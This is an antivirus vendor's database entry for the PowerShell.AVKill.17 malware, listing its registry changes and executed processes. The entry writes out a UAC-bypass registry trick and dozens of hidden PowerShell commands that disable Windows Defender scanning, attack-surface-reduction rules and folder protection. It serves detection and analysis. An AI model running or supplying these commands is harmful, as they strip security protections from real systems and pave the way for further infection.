Meine Bibliothek
Meine Bibliothek

+ Zur Bibliothek hinzufügen

Support

Ihre Anfragen

Rufen Sie uns an

+7 (495) 789-45-86

Profil

PowerShell.AVKill.17

Added to the Dr.Web virus database: 2024-01-31

Virus description added:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [HKCU\SOFTWARE\Classes\ms-settings\shell\open\command] '' = '<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DW...
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -MAPSReporting 0 " -WindowStyle Hidden -Verb RunAs'
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -MAPSReporting 0 -WindowStyle Hidden -Verb RunAs
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
Launches a large number of processes
Modifies file system
Creates the following files
  • %TEMP%\it.bat
Miscellaneous
Creates and executes the following
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\it.bat" "' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' windowstyle hidden Set-MpPreference -ScanScheduleDay 8' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ExclusionExtension exe' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UILockdown 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders []' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanParameters 1' (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\it.bat" "
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders []
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0
  • '<SYSTEM32>\timeout.exe' /t 120 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuratio...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -UILockdown 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8 '-WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine 1 " -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SevereThreatDefaultAction Ignore " -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList 'windowstyle hidden Set-MpPreference -ScanScheduleDay 8' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanParameters 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore '-WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -LowThreatDefaultAction Ignore" -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ExclusionExtension exe
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' windowstyle hidden Set-MpPreference -ScanScheduleDay 8
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UILockdown 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ExclusionExtension exe ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\timeout.exe' /t 15 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c ' -WindowStyle Hidden -Verb ...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5' -WindowStyle Hidden -Verb R...
  • '<SYSTEM32>\timeout.exe' /t 5 /nobreak
  • '<SYSTEM32>\reg.exe' ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
  • '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdm...
  • '<SYSTEM32>\timeout.exe' /t 20 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 3b576869-a4ec-4529-8536-b80a7769e899 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders [] ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_...
